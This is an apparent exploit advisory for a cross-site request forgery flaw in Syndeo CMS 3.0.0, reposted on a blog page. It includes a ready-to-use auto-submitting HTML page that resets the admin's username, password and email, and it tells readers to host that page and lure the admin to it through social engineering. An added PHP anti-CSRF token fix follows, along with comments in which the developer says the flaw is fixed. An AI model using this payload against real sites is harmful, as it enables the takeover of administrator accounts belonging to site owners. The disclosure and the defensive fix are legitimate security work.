Syndeo CMS Admin Password Change through CSRF


# Exploit Title: Syndeo CMS Admin Password Change through CSRF
# Google Dork: none
# Date: 5/12/2013
# Exploit Author: Aditya Joshi
# Vendor Homepage: http://www.syndeocms.org/
# Software Link: http://sourceforge.net/projects/syndeocms/files/1.%20SyndeoCMS/
# Version: 3.0.0
# Tested on: Windows 7
# Status: Fixed

Description:
In Syndeo CMS an attacker can change the admin's name, password and email through a CSRF vulnerability.
The vulnerability exists at http://localhost/cms/starnet/index.php?option=configuration&save=personal, where the admin name and password change fields are submitted without any anti-CSRF token.

Exploiting the bug:
Create an HTML page and paste the following HTML code into it:

exploit.html


<html>
<body onload="form1.submit();">
  <form method="POST" name="form1" action="http://localhost/cms/starnet/index.php?option=configuration&save=personal">
    <input class="textfield" type="text" value="hacker" size="40" name="fullname" tabindex="1">
    <input class="textfield" type="text" value="hacker@email.com" size="40" name="email" tabindex="2">
    <input class="textfield" type="text" value="admin" size="20" name="username" tabindex="3">
    <input class="textfield" type="password" value="hacker" size="20" name="password" tabindex="4">
  </form>
</body>
</html>


Upload the malicious page to any free web hosting site.
Then send the link to the malicious HTML page to the admin of the vulnerable Syndeo web app through social engineering.

To fix this bug, kindly visit this link
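As an added example of the kind of fix the advisory points at (this is not the author's code nor SyndeoCMS's own patch), the personal-settings handler below issues a per-session anti-CSRF token, embeds it in the form and refuses any POST that does not carry a matching copy. The field names are taken from the form above; the csrf_token field name and the handler layout are assumptions.

```php
<?php
// Added example, not SyndeoCMS code: anti-CSRF token for the
// personal-settings form (index.php?option=configuration&save=personal).
session_start();

// One random token per session, created on first use. A cross-site page
// cannot read it, so it cannot include it in a forged POST.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_valid($submitted): bool {
    if (!isset($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        // Forged or replayed request: log it and change nothing.
        error_log('CSRF token check failed for personal settings save');
        http_response_code(403);
        exit('Invalid or missing CSRF token; settings not changed.');
    }
    // Token verified: the POST came from a form this server rendered.
    // ... existing save logic for fullname, email, username, password ...
}
?>
<form method="POST" action="index.php?option=configuration&amp;save=personal">
  <input type="hidden" name="csrf_token"
         value="<?php echo htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8'); ?>">
  <input type="text" name="fullname" size="40">
  <input type="text" name="email" size="40">
  <input type="text" name="username" size="20">
  <input type="password" name="password" size="20">
  <input type="submit" value="Save">
</form>
```

Requiring the current password before accepting a new one, and marking the session cookie SameSite, are independent defences that also stop the exploit page above from changing the admin account.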

Greets ---> Aditya Dixit, Deejay alone , Indian Web King....


3 comments:

  1. I have fixed this exploit , see our forum: http://www.syndeocms.org/forum/index.php?topic=2208.0

    Kind regards Fred Stuurman
    Main developer SyndeoCMS

    1. there are so many exploits in it

  2. Good work bro, in the next update of your CMS I will surely try to find bugs and will report to you

